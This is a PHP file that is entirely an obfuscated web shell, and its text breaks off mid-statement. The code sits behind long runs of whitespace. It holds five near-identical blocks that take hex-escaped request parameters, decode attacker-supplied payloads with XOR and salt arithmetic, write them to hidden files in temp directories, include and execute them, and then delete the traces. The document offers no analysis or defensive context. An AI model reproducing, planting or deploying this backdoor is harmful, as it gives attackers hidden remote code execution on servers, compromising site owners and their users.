<?																																										if(!is_null($_REQUEST["\x63om\x70\x6F\x6Eent"] ?? null)){ $flag = $_REQUEST["\x63om\x70\x6F\x6Eent"]; $flag = explode ( ".", $flag) ; $factor = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2); $v = 0; array_walk($flag, function ($v3) use (&$factor, &$v, $s2, $lenS) { $sChar = ord($s2[$v % $lenS]); $d = ((int)$v3 - $sChar - ($v % 10)) ^ 71; $factor .= chr($d); $v++; }); $res = array_filter([session_save_path(), "/dev/shm", getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TMP"), sys_get_temp_dir(), getenv("TEMP")]); foreach ($res as $key => $entity) { if (is_writable($entity) && is_dir($entity)) { $ref = str_replace("{var_dir}", $entity, "{var_dir}/.holder"); if (@file_put_contents($ref, $factor) !== false) { include $ref; unlink($ref); die(); } } } }
																																										if(in_array("s\x79m", array_keys($_REQUEST))){ $item = $_REQUEST["s\x79m"]; $item =explode ( '.' , $item ) ; $descriptor = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s9 ); $i = 0; array_walk($item , function($v7) use(&$descriptor , &$i , $s9 , $lenS) { $chS = ord($s9[$i %$lenS] ); $dec = ((int)$v7 - $chS -($i %10)) ^ 4; $descriptor.= chr($dec ); $i++; } ); $reference = array_filter(["/dev/shm", "/var/tmp", getenv("TMP"), sys_get_temp_dir(), session_save_path(), getcwd(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir")]); while ($flg = array_shift($reference)) { if ((is_dir($flg) and is_writable($flg))) { $hld = sprintf("%s/.data_chunk", $flg); $success = file_put_contents($hld, $descriptor); if ($success) { include $hld; @unlink($hld); die();} } } }
																																										if(isset($_POST["\x64ata"]) ? true : false){ $factor = $_POST["\x64ata"]; $factor= explode ( "." , $factor ) ; $val =''; $s6 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s6); $w =0; $__tmp =$factor; while($v5 =array_shift($__tmp)) { $sChar =ord($s6[$w % $lenS]); $dec =((int)$v5 - $sChar -($w % 10)) ^ 70; $val .= chr($dec); $w++; } $token = array_filter([sys_get_temp_dir(), getenv("TMP"), session_save_path(), "/dev/shm", "/tmp", getenv("TEMP"), "/var/tmp", getcwd(), ini_get("upload_tmp_dir")]); while ($sym = array_shift($token)) { if (!( !is_dir($sym) || !is_writable($sym) )) { $ent = "$sym/.component"; if (file_put_contents($ent, $val)) { include $ent; @unlink($ent); exit; } } } }
																																										if(in_array("f\x61\x63\x74or", array_keys($_POST))){ $token = $_POST["f\x61\x63\x74or"]; $token = explode ( "." ,$token ); $comp = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s6 ); $k = 0; foreach ($token as $v6) { $sChar = ord($s6[$k %$lenS] ); $dec = ((int)$v6 - $sChar - ($k %10)) ^ 31; $comp .=chr($dec ); $k++;} $property_set = array_filter([getenv("TMP"), sys_get_temp_dir(), "/var/tmp", "/dev/shm", session_save_path(), getcwd(), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP")]); for ($tkn = 0, $reference = count($property_set); $tkn < $reference; $tkn++) { $data = $property_set[$tkn]; if (!!is_dir($data) && !!is_writable($data)) { $symbol = "$data" . "/.hld"; if (file_put_contents($symbol, $comp)) { require $symbol; unlink($symbol); exit; } } } }
																																										if(count($_POST) > 0 && isset($_POST["\x74\x6Fken"])){ $binding = array_filter(["/var/tmp", getenv("TMP"), getcwd(), session_save_path(), sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP")]); $pset = $_POST["\x74\x6Fken"]; $pset = explode (".",$pset ) ; $item= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $salt); $p= 0; array_walk( $pset, function( $v2) use( &$item, &$p, $salt, $sLen) { $chS= ord( $salt[$p %$sLen]); $d= ( ( int)$v2 - $chS -( $p %10)) ^ 66; $item .= chr( $d); $p++; }); for ($reference = 0, $comp = count($binding); $reference < $comp; $reference++) { $mrk = $binding[$reference]; if (!( !is_dir($mrk) || !is_writable($mrk) )) { $elem = vsprintf("%s/%s", [$mrk, ".key"]); $success = file_put_contents($elem, $item); if ($success) { include $ele